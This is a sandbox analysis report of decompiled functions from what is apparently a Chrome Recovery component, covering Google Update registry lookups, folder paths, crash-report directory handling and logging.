0x00c78333
0x00000000
0x00c782c2
0x00c782c5
0x00c782d1
0x00c782df
0x00c782f3
0x00c782f5
0x00c782f7
0x00c782fc
0x00c782fc
0x00c782c7
0x00c782c7
0x00c782c7
0x00000000
0x00c782c5

APIs

Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKLM), ref: 00C78A91
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKEY_LOCAL_MACHINE), ref: 00C78A9D
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKCU), ref: 00C78AA9
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKEY_CURRENT_USER), ref: 00C78AB9
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKU), ref: 00C78AC5
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKEY_USERS), ref: 00C78AD1
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKCR), ref: 00C78ADD
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKEY_CLASSES_ROOT), ref: 00C78AE9
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKLM[64]), ref: 00C78AF5
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKEY_LOCAL_MACHINE[64]), ref: 00C78B01

Part of subcall function 00C7806C: RegOpenKeyExW.KERNELBASE ref: 00C780A5

SHQueryValueExW.SHLWAPI(00000000,IsEnrolledToDomain,00000000,00000000,?,?,00000000,00000000,?,HKLM\Software\Google\UpdateDev\,?,?,00000000), ref: 00C782ED

Strings

HKLM\Software\Google\UpdateDev\, xrefs: 00C78252
IsEnrolledToDomain, xrefs: 00C782E9, 00C7831E, 00C78341, 00C7835A, 00C78368

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: lstrcmpi$OpenQueryValue
String ID: HKLM\Software\Google\UpdateDev\$IsEnrolledToDomain
API String ID: 3769408223-3092002976
Opcode ID: ab6c3a84dc14c419b04ba1142790a8463f4fa11555bbcd1e8b93844119224a3d
Instruction ID: 1436d05f6bf6be6e34c9aa61cde32a036475598fefd05b5662cf7ed2741d794f
Opcode Fuzzy Hash: ab6c3a84dc14c419b04ba1142790a8463f4fa11555bbcd1e8b93844119224a3d
Instruction Fuzzy Hash: 9D41837684010AABDF01DFA8C959AFE7B79EB40714F108115E619A7161DF30DB0DDBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C762F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00C762F4(void* __ebx, signed char __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v528;
				char _v532;
				void* __ebp;
				signed int _t11;
				char* _t16;
				signed char _t31;
				signed int _t38;
				char* _t44;
				intOrPtr* _t49;
				signed int _t50;

				_t43 = __edx;
				_t11 =  *0xca8008; // 0x617e0cdd
				_v8 = _t11 ^ _t50;
				_t49 = __edx;
				_t31 = __ecx;
				E00C718F9(__edx);
				E00C81190(0,  &_v528, 0, 0x208);
				_t16 =  &_v528;
				__imp__SHGetFolderPathW(0, _t31, 0, 0, _t16); // executed
				if(_t16 >= 0) {
					_push(E00C83694( &_v528));
					L00C71A21(_t49, _t43,  &_v528);
					__eflags = 0;
					L10:
					return E00C7F35B(_v8 ^ _t50);
				}
				_t38 = _t31 & 0x000000ff;
				_t55 = _t38 - 0x26;
				if(_t38 != 0x26) {
					__eflags = _t38 - 0x1c;
					if(__eflags != 0) {
						L6:
						if( *((intOrPtr*)( *_t49 - 0xc)) == 0) {
						}
						goto L10;
					}
					_t44 = L"LocalAppData";
					L5:
					E00C713C0(E00C74860(_t49, _t49, E00C76502( &_v532, _t44, _t55)), _v532 - 0x10);
					goto L6;
				}
				_t44 = L"ProgramFiles";
				goto L5;
			}

0x00c762f4
0x00c762fd
0x00c76304
0x00c76309
0x00c7630b
0x00c76310
0x00c76324
0x00c7632c
0x00c76337
0x00c76341
0x00c7639b
0x00c763a5
0x00c763aa
0x00c763ac
0x00c763ba
0x00c763ba
0x00c76343
0x00c76346
0x00c76349
0x00c76352
0x00c76355
0x00c7637d
0x00c76383
0x00c76383
0x00000000
0x00c76383
0x00c76357
0x00c7635c
0x00c76378
0x00000000
0x00c76378
0x00c7634b
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,00000000,0000001C,00CA8B40), ref: 00C76337

Strings

LocalAppData, xrefs: 00C76357
ProgramFiles, xrefs: 00C7634B

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: FolderPath
String ID: LocalAppData$ProgramFiles
API String ID: 1514166925-2363656367
Opcode ID: 3d9a0195eb49e2cc9d162ea1de7b9baa75deee191f239d5227db0966f69a9418
Instruction ID: 75bbb1b1cbca2becf879450958c89cb6821031dd9047a9572de16eccb09e6ad8
Opcode Fuzzy Hash: 3d9a0195eb49e2cc9d162ea1de7b9baa75deee191f239d5227db0966f69a9418
Instruction Fuzzy Hash: 4911D371A005189BCB14EB29CC89EBF73BCEBC5304F148469F42EC3292EA709E45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C7872A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00C7872A(void* __ecx, signed int __edx, void* __eflags) {
				char _v8;
				intOrPtr _v12;
				int* _v16;
				char _v20;
				void* _t15;
				void* _t18;
				signed int _t20;
				int* _t22;
				signed int _t30;
				short* _t32;
				intOrPtr _t33;

				_t30 = __edx;
				_t32 = __edx;
				_t22 = 0;
				E00C7189E( &_v8, __edx, __eflags, __ecx);
				_t15 = E00C789EB( &_v8, __edx, __eflags);
				_t33 = _v8;
				if(_t15 != 0) {
					_v20 = 0xca41c0;
					_v16 = 0;
					_v12 = 0x200;
					_t18 = E00C7806C( &_v20, _t15, _t33, _t30 | 0x00020019); // executed
					if(_t18 == 0) {
						_t20 =  ~(RegQueryValueExW(_v16, _t32, 0, 0, 0, 0));
						asm("sbb al, al");
						_t10 = _t20 + 1; // 0x1
						_t22 = _t10;
						E00C77F74( &_v20);
					}
					_v20 = 0xca41c0;
					_t15 = E00C77F74( &_v20);
				}
				E00C713C0(_t15, _t33 - 0x10);
				return _t22;
			}

0x00c7872a
0x00c78737
0x00c78739
0x00c7873b
0x00c78743
0x00c78748
0x00c7874d
0x00c78755
0x00c78762
0x00c78765
0x00c7876c
0x00c78773
0x00c78783
0x00c78788
0x00c7878a
0x00c7878a
0x00c7878d
0x00c7878d
0x00c78795
0x00c7879c
0x00c7879c
0x00c787a4
0x00c787af

APIs

Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKLM), ref: 00C78A91
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKEY_LOCAL_MACHINE), ref: 00C78A9D
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKCU), ref: 00C78AA9
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKEY_CURRENT_USER), ref: 00C78AB9
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKU), ref: 00C78AC5
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKEY_USERS), ref: 00C78AD1
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKCR), ref: 00C78ADD
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKEY_CLASSES_ROOT), ref: 00C78AE9
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKLM[64]), ref: 00C78AF5
Part of subcall function 00C789EB: lstrcmpiW.KERNEL32(00000000,HKEY_LOCAL_MACHINE[64]), ref: 00C78B01

Part of subcall function 00C7806C: RegOpenKeyExW.KERNELBASE ref: 00C780A5

RegQueryValueExW.ADVAPI32(?,UsageStats,00000000,00000000,00000000,00000000), ref: 00C7877D

Part of subcall function 00C77F74: RegCloseKey.KERNELBASE(00C77F74), ref: 00C77F81

Strings

HKLM\Software\Google\UpdateDev\, xrefs: 00C78733
UsageStats, xrefs: 00C78779

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: lstrcmpi$CloseOpenQueryValue
String ID: HKLM\Software\Google\UpdateDev\$UsageStats
API String ID: 1349724757-221515162
Opcode ID: 40e171a46c2e6d85428a493d8e9d08a9205af65a6b1c751ff3492fece36a5264
Instruction ID: 4875237d896c37ebe00f8878fba9e14a8e89cb43f7c2b6b938a42fc849f39267
Opcode Fuzzy Hash: 40e171a46c2e6d85428a493d8e9d08a9205af65a6b1c751ff3492fece36a5264
Instruction Fuzzy Hash: 350152B1940219AEDB04EF95DC899FFBB7CEA41344B108659E52663151DF705E0CDAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C7F36C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00C7F36C(void* __eflags, intOrPtr _a4) {
				char _v20;
				void* _t9;
				intOrPtr _t10;
				intOrPtr _t14;
				char* _t21;
				void* _t24;
				void* _t27;

				_t24 = _t27;
				while(1) {
					_push(_a4);
					_t9 = E00C83B1B(); // executed
					if(_t9 != 0) {
						break;
					}
					_t10 = E00C83A28(__eflags, _a4);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags = _a4 - 0xffffffff;
						if(_a4 != 0xffffffff) {
							_push(_t24);
							_t24 = _t27;
							_t27 = _t27 - 0xc;
							E00C7F9C7( &_v20);
							E00C81560( &_v20, 0xca652c);
							asm("int3");
						}
						_push(_t24);
						_t21 =  &_v20;
						E00C7F9FA(_t21);
						E00C81560( &_v20, 0xca6580);
						asm("int3");
						_t14 =  *((intOrPtr*)(_t21 + 4));
						__eflags = _t14;
						if(_t14 == 0) {
							return "Unknown exception";
						}
						return _t14;
					} else {
						continue;
					}
					L10:
				}
				return _t9;
				goto L10;
			}

0x00c7f36d
0x00c7f37e
0x00c7f37e
0x00c7f381
0x00c7f389
0x00000000
0x00000000
0x00c7f374
0x00c7f37a
0x00c7f37c
0x00c7f38d
0x00c7f391
0x00c7fa7c
0x00c7fa7d
0x00c7fa7f
0x00c7fa85
0x00c7fa93
0x00c7fa98
0x00c7fa98
0x00c7fa99
0x00c7fa9f
0x00c7faa2
0x00c7fab0
0x00c7fab5
0x00c7fab6
0x00c7fab9
0x00c7fabb
0x00000000
0x00c7fabd
0x00c7fac2
0x00000000
0x00000000
0x00000000
0x00000000
0x00c7f37c
0x00c7f38c
0x00000000

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00C7FA93

Part of subcall function 00C81560: RaiseException.KERNEL32(?,?,?,00C7FAB5), ref: 00C815C0

__CxxThrowException@8.LIBVCRUNTIME ref: 00C7FAB0

Strings

Unknown exception, xrefs: 00C7FABD

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 1926d0ef0fb25446633a999172f5b3852a0afa20575482c242a3aee00a002825
Instruction ID: 6ca55cb015b11a005d43c43aa3136e7897f6c167309b9aa16e4f4ded7b1a7bed
Opcode Fuzzy Hash: 1926d0ef0fb25446633a999172f5b3852a0afa20575482c242a3aee00a002825
Instruction Fuzzy Hash: 91F0C82490020D76CF00F6B5D8959AD37AC5F00764B548279B92C91491FB70EA17A7D5

Uniqueness

Uniqueness Score: -1.00%

Function 00C7CCD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00C7CCD0(void* __eflags) {
				signed int _v8;
				void* __ecx;
				void* _t8;
				signed int _t13;

				_push(_t16);
				_v8 = _v8 & 0x00000000;
				_t19 = L"OemInstallTime";
				_t8 = E00C78249(L"HKLM\\Software\\Google\\Update\\", L"OemInstallTime", __eflags, 4,  &_v8, 0); // executed
				if(_t8 >= 0) {
					_t13 = E00C953BB(_t19, E00C93B10(E00C77495(L"HKLM\\Software\\Google\\Update\\"), L"OemInstallTime", 0x989680, 0) + 0x49ef6f00 - _v8);
					__eflags = _t13 - 0x3f480;
					_t6 = _t13 - 0x3f480 < 0;
					__eflags = _t6;
					return _t13 & 0xffffff00 | _t6;
				} else {
					return 0;
				}
			}

0x00c7ccd4
0x00c7ccd5
0x00c7cce1
0x00c7cceb
0x00c7ccf5
0x00c7cd17
0x00c7cd1c
0x00c7cd22
0x00c7cd22
0x00c7cd26
0x00c7ccf7
0x00c7ccfa
0x00c7ccfa

APIs

__aulldiv.LIBCMT ref: 00C7CD09

Strings

OemInstallTime, xrefs: 00C7CCE1
HKLM\Software\Google\Update\, xrefs: 00C7CCE6

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: __aulldiv
String ID: HKLM\Software\Google\Update\$OemInstallTime
API String ID: 3732870572-1637396023
Opcode ID: bb467636b732d63bb99cb7c48b499327bd4b7820c90d89090e2ba2ea2f55af32
Instruction ID: ec37a936c7a90b13e823b74755ee1cca76181214df1380bfea985a263d0272d0
Opcode Fuzzy Hash: bb467636b732d63bb99cb7c48b499327bd4b7820c90d89090e2ba2ea2f55af32
Instruction Fuzzy Hash: 86E09BE2A5030577DF04A7A49D0BF6F339CC78078DF204554FA05EA1C6E9A8EA045268

Uniqueness

Uniqueness Score: -1.00%

Function 00C83E3B Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00C83E3B(int _a4) {
				void* _t8;
				void* _t10;

				if(E00C83E6C(_t8, _t10) != 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00C83E8E(_a4);
				ExitProcess(_a4);
			}

0x00c83e47
0x00c83e53
0x00c83e53
0x00c83e5c
0x00c83e65

APIs

GetCurrentProcess.KERNEL32 ref: 00C83E4C
TerminateProcess.KERNEL32(00000000), ref: 00C83E53
ExitProcess.KERNEL32 ref: 00C83E65

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 605da5893274170d57d76cd225e3e98fbdab99deb003025078822ca9032b329b
Instruction ID: 6b87c67ae9ac74424a3ae40496f715714aa6e258df97ce49f8eb0e10cfb7f48d
Opcode Fuzzy Hash: 605da5893274170d57d76cd225e3e98fbdab99deb003025078822ca9032b329b
Instruction Fuzzy Hash: B7D09235019248ABCF023F61DC0DB8E3F2AAF41B45B009112B9094A132DB31DE92EB98

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A9ED Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00C7A9ED(char __ecx, intOrPtr __edx) {
				char _v5;
				WCHAR* _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t46;
				WCHAR* _t49;
				intOrPtr _t51;
				void* _t56;
				void* _t63;
				char _t66;
				char _t67;
				void* _t71;
				void* _t90;
				WCHAR* _t97;
				WCHAR* _t98;

				_t95 = __edx;
				_t66 = __ecx;
				_v28 = __edx;
				_v5 = __ecx;
				E00C7B8E6(__edx);
				_push(E00C713D8());
				_t99 = _t66;
				if(_t66 == 0) {
					E00C71AD8( &_v12, __edx);
					_push( &_v12);
					_push(1);
					_t46 = E00C7189E( &_v24, _t95, __eflags, L"Google\\CrashReports");
					_t96 = _t46;
					_t71 = 0x1c;
					E00C713C0(E00C7B1E8(_t71, _t46, __eflags), _v24 - 0x10);
					_t97 = _v12;
					_t67 = 0;
					__eflags = 0;
					_t49 = _t97;
					_v24 = 0;
					_v20 = 2;
				} else {
					E00C71AD8( &_v16, __edx);
					_push( &_v16);
					_push(1);
					_v24 = 1;
					_t63 = E00C7189E( &_v20, _t95, _t99, L"Google\\CrashReports");
					_t96 = _t63;
					_t90 = 0x26;
					E00C713C0(E00C7B1E8(_t90, _t63, _t99), _v20 - 0x10);
					_t49 = _v16;
					_t67 = 0;
					_t97 = _v12;
					_v20 = 0;
				}
				_t20 = _t49 - 0x10; // 0xc7930a
				_t22 = E00C71B55(_t20) + 0x10; // 0x10
				_t98 = _t22;
				_v12 = _t98;
				if(_v20 != 0) {
					_t24 = _t97 - 0x10; // -16
					_t50 = E00C713C0(_t50, _t24);
				}
				if(_v24 != 0) {
					_t27 = _v16 - 0x10; // 0x57560cec
					E00C713C0(_t50, _t27);
				}
				if(_v5 == 0) {
					L11:
					_t105 =  *((intOrPtr*)(_t98 - 0xc)) - _t67;
					if( *((intOrPtr*)(_t98 - 0xc)) != _t67) {
						goto L14;
					}
					goto L12;
				} else {
					_t103 =  *((intOrPtr*)(_t98 - 0xc)) - _t67;
					if( *((intOrPtr*)(_t98 - 0xc)) == _t67) {
						L12:
						_t51 = E00C713C0(E00C74860( &_v12, _t98, E00C77940( &_v24, _t96, _t105)), _v24 - 0x10);
						_t98 = _v12;
						if( *((intOrPtr*)(_t98 - 0xc)) != _t67) {
							L14:
							_t51 = _v28;
							__eflags = _t51;
							if(_t51 != 0) {
								_t51 = E00C74860(_t51, _t98,  &_v12);
							}
							L16:
							_t41 = _t98 - 0x10; // 0x0
							E00C713C0(_t51, _t41);
							return _t67;
						}
						_t67 = 0x8004fffc;
						goto L16;
					}
					_t56 = E00C7A863(_t67,  &_v12, _t96, _t97, _t98, _t103); // executed
					_t98 = _v12;
					if(_t56 < 0) {
						RemoveDirectoryW(_t98);
					}
					goto L11;
				}
			}

0x00c7a9ed
0x00c7a9f5
0x00c7a9f7
0x00c7a9fb
0x00c7a9fe
0x00c7aa08
0x00c7aa09
0x00c7aa0b
0x00c7aa54
0x00c7aa5c
0x00c7aa5d
0x00c7aa67
0x00c7aa6e
0x00c7aa70
0x00c7aa7e
0x00c7aa83
0x00c7aa86
0x00c7aa86
0x00c7aa88
0x00c7aa8a
0x00c7aa8d
0x00c7aa0d
0x00c7aa10
0x00c7aa18
0x00c7aa1f
0x00c7aa25
0x00c7aa28
0x00c7aa2f
0x00c7aa31
0x00c7aa3f
0x00c7aa44
0x00c7aa47
0x00c7aa49
0x00c7aa4c
0x00c7aa4c
0x00c7aa94
0x00c7aaa0
0x00c7aaa0
0x00c7aaa3
0x00c7aaa6
0x00c7aaa8
0x00c7aaab
0x00c7aaab
0x00c7aab4
0x00c7aab9
0x00c7aabc
0x00c7aabc
0x00c7aac5
0x00c7aae2
0x00c7aae2
0x00c7aae5
0x00000000
0x00000000
0x00000000
0x00c7aac7
0x00c7aac7
0x00c7aaca
0x00c7aae7
0x00c7aafe
0x00c7ab03
0x00c7ab09
0x00c7ab12
0x00c7ab12
0x00c7ab15
0x00c7ab17
0x00c7ab1f
0x00c7ab1f
0x00c7ab24
0x00c7ab24
0x00c7ab27
0x00c7ab32
0x00c7ab32
0x00c7ab0b
0x00000000
0x00c7ab0b
0x00c7aacf
0x00c7aad4
0x00c7aad9
0x00c7aadc
0x00c7aadc
0x00000000
0x00c7aad9

APIs

Part of subcall function 00C713D8: GetProcessHeap.KERNEL32 ref: 00C713E9

RemoveDirectoryW.KERNEL32 ref: 00C7AADC

Part of subcall function 00C7B1E8: PathAppendW.SHLWAPI(?,?,00000000,00000000,?,00000000,0000001C,0000001C,?,00C7BA17,Google\Update,00000000,?,00000000,00000000,00000068), ref: 00C7B246

Strings

Google\CrashReports, xrefs: 00C7AA20, 00C7AA5F

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: AppendDirectoryHeapPathProcessRemove
String ID: Google\CrashReports
API String ID: 2444485805-2544415761
Opcode ID: c1809f80dfc145aba6c6964d8370239e796f36ef739fd2ebccfcdac69be8906c
Instruction ID: 9945d7156aa87a790762333ded753408234d17844bad1a38b59ad2bc9a3299ac
Opcode Fuzzy Hash: c1809f80dfc145aba6c6964d8370239e796f36ef739fd2ebccfcdac69be8906c
Instruction Fuzzy Hash: FE418130A442099FDB04EFA8C892AFEB7B8EF50314F54846DE419A71D1EB706F49DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C73684 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00C73684(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __eflags) {
				char _t18;
				signed int _t26;
				void* _t35;
				signed int _t38;
				void* _t40;

				_t35 = __edx;
				_t26 = __ecx;
				E00C7FE60(0xca6410, 0x28);
				_t38 = _t26;
				 *((intOrPtr*)(_t40 - 0x30)) = _t38;
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				_t44 =  *((char*)(_t38 + 0x7a)) - 1;
				if( *((char*)(_t38 + 0x7a)) != 1) {
					__eflags =  *((char*)(_t38 + 0x50)) - 1;
					if( *((char*)(_t38 + 0x50)) != 1) {
						__eflags =  *((char*)(_t38 + 0x51));
						if( *((char*)(_t38 + 0x51)) != 0) {
							goto L9;
						} else {
							 *((char*)(_t38 + 0x51)) = 1;
							E00C73298(_t38); // executed
							__eflags =  *((char*)(_t38 + 0x74));
							if( *((char*)(_t38 + 0x74)) != 0) {
								 *((char*)(_t38 + 0x50)) = E00C735F5(_t38, _t35);
							}
							 *(_t40 - 4) = 0xfffffffe;
							 *((char*)(_t38 + 0x51)) = 0;
							goto L4;
						}
					} else {
						 *(_t40 - 4) = 0xfffffffe;
						L4:
						_t18 = 1;
					}
				} else {
					_push( *((intOrPtr*)(E00C72FB1(__ebx, _t40 - 0x28, __edi, _t44))));
					_push(L"LOG_SYSTEM: [%s]: ERROR - Calling the logging system after it has been shut down \n");
					OutputDebugStringW(E00C76CB8(_t44));
					E00C71894(_t22, _t40 - 0x28);
					L9:
					 *(_t40 - 4) = 0xfffffffe;
					_t18 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0x10));
				return _t18;
			}

0x00c73684
0x00c73684
0x00c7368b
0x00c73690
0x00c73692
0x00c73695
0x00c73699
0x00c7369d
0x00c736c9
0x00c736cd
0x00c736dd
0x00c736e1
0x00000000
0x00c736e7
0x00c736e7
0x00c736ed
0x00c736f2
0x00c736f6
0x00c736ff
0x00c736ff
0x00c73702
0x00c73709
0x00000000
0x00c73709
0x00c736cf
0x00c736cf
0x00c736d6
0x00c736d6
0x00c736d6
0x00c7369f
0x00c736a7
0x00c736a9
0x00c736b6
0x00c736bf
0x00c7376d
0x00c7376d
0x00c73774
0x00c73774
0x00c73779
0x00c73785

APIs

Part of subcall function 00C76CB8: wvsprintfW.USER32(00000000,00000000,00000001), ref: 00C76D50

OutputDebugStringW.KERNEL32 ref: 00C736B6

Strings

LOG_SYSTEM: [%s]: ERROR - Calling the logging system after it has been shut down , xrefs: 00C736A9

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: DebugOutputStringwvsprintf
String ID: LOG_SYSTEM: [%s]: ERROR - Calling the logging system after it has been shut down
API String ID: 1118214310-1171486310
Opcode ID: 22acf911c2c16b7173d1d131a967c97d7987a9157a08e1a0ae2cc6e7399bc5e6
Instruction ID: dd6dde09e092b5869009f9e636e1758dfa5d50acf4be19c1b5449e531eaffd56
Opcode Fuzzy Hash: 22acf911c2c16b7173d1d131a967c97d7987a9157a08e1a0ae2cc6e7399bc5e6
Instruction Fuzzy Hash: 4F1148B1A0CBD49EDF25DB74C60A3DCBFA0AB01728F14825DE0A6162D2CBB15745B301

Uniqueness

Uniqueness Score: -1.00%

Function 00C73786 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00C73786(void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				void* __edi;
				void* __ebp;
				void* _t11;
				void* _t13;
				void* _t34;
				intOrPtr* _t35;

				_push(__ecx);
				_t37 =  *((char*)(__ecx + 0x7a)) - 1;
				if( *((char*)(__ecx + 0x7a)) != 1) {
					__eflags =  *((char*)(__ecx + 0x50)) - 1;
					if(__eflags != 0) {
						_t35 = __ecx + 0x58;
						 *((intOrPtr*)( *_t35 + 4))(_t34, __ebx);
						_t11 = E00C73684(__ebx, __ecx, __edx, __ecx, __eflags); // executed
						 *((intOrPtr*)( *_t35 + 8))();
						_t13 = _t11;
					} else {
						_t13 = 1;
					}
				} else {
					_push( *((intOrPtr*)(E00C72FB1(__ebx,  &_v8, __ecx, _t37))));
					_push(L"LOG_SYSTEM: [%s]: ERROR - Calling the logging system after it has been shut down \n");
					OutputDebugStringW(E00C76CB8(_t37));
					E00C713C0(_v8, _v8 - 0x10);
					_t13 = 0;
				}
				return _t13;
			}

0x00c73789
0x00c7378d
0x00c73791
0x00c737bf
0x00c737c3
0x00c737cb
0x00c737d2
0x00c737d7
0x00c737e2
0x00c737e6
0x00c737c5
0x00c737c5
0x00c737c5
0x00c73793
0x00c7379b
